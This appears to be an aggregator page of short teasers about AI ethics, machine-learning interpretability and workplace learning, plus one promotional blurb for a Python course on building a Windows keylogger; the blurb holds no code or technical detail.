AI developers: don't forget ethics London Business School

#artificialintelligence

Human biases can become part of the technology people create, according to Nicos Savva, Associate Professor of Management Science and Operations at London Business School. A recent House of Lords Select Committee on Artificial Intelligence (AI) "AI in the UK: Ready, Willing and Able?" urged people using and developing AI to put ethics centre stage. The committee suggested a cross-sector AI Code, with five principles that could be applied globally including that artificial intelligence should "be developed for the common good and benefit of humanity" and should "operate on principles of intelligibility and fairness". The committee's chairman, Lord Clement-Jones, said in a statement: "The UK has a unique opportunity to shape AI positively for the public's benefit and to lead the international community in AI's ethical development, rather than passively accept its consequences." He added that "AI is not without its risks".


AI – unlocking the black box London Business School

#artificialintelligence

It has been called the'dark heart' of artificial intelligence (AI) – the complicated'black box' of hidden machine learning algorithms that many would have us believe will allow AI to take our jobs and run our lives. But before that can happen AI must be integrated into our everyday systems and protocols – including regulation. Product users and stakeholders must also have trust in AI and machine learning – otherwise they simply won't use it. New interpretability techniques are now making it possible to lift the lid on the black box. Overcoming the "Why should I trust you?" scepticism about AI and machine learning is perhaps the biggest challenge that businesses need to master to gain trust from their stakeholders – customers, employees, shareholders, regulators and broader society.


Want to future-proof your business? Try a customised learning programme

#artificialintelligence

The past two decades have seen the workplace transformed by digital advances. Gone are many traditional structures and practices, replaced with new ways of doing business, designed to support collaboration and digitally-enabled remote and flexible working. As the technology behind AI and robotics becomes more sophisticated, the number of jobs that remain untouched by automation will decrease. "To keep pace, businesses must rethink how they organise work, reinvent jobs, redeploy staff and implement robust plans for the future," says Lynda Gratton, professor of management practice at London Business School (LBS). There are also emerging social trends and shifting demographics to consider.


The Python Ethical Hacking Course: Windows Keylogger

@machinelearnbot

If your computer could talk, it would spill all sorts of secrets. This data could divulge a wealth of lucrative information you'd never want exposed to an unauthorized party. In this course we dive into writing our own keylogger tool for surveilling the target system to extract some of this sensitive information. I won't name names, but I tested these tools against three major Windows antivirus vendors and not one reported any malicious activity taking place. We'll utilize Python to create a tool that will collect keystroke inputs from a target Windows system.


Building ethical AI in healthcare: why we must demand it

#artificialintelligence

There is a school of thought that ponders a dark, dystopian future where artificially intelligent machines brutally and coldly run the world, with humans as only a biological tool. From Hollywood blockbusters, to evangelic tech entrepreneurs, we've all been exposed to the possibility of this type of future, but have we all stopped to ponder how we should avoid it? Now, of course, all of this dystopia is many many decades away, and only one of several gazillion possible future outcomes. But that doesn't preclude getting the conversation started today. For me, and many others, it boils down to one simple thing: ethics.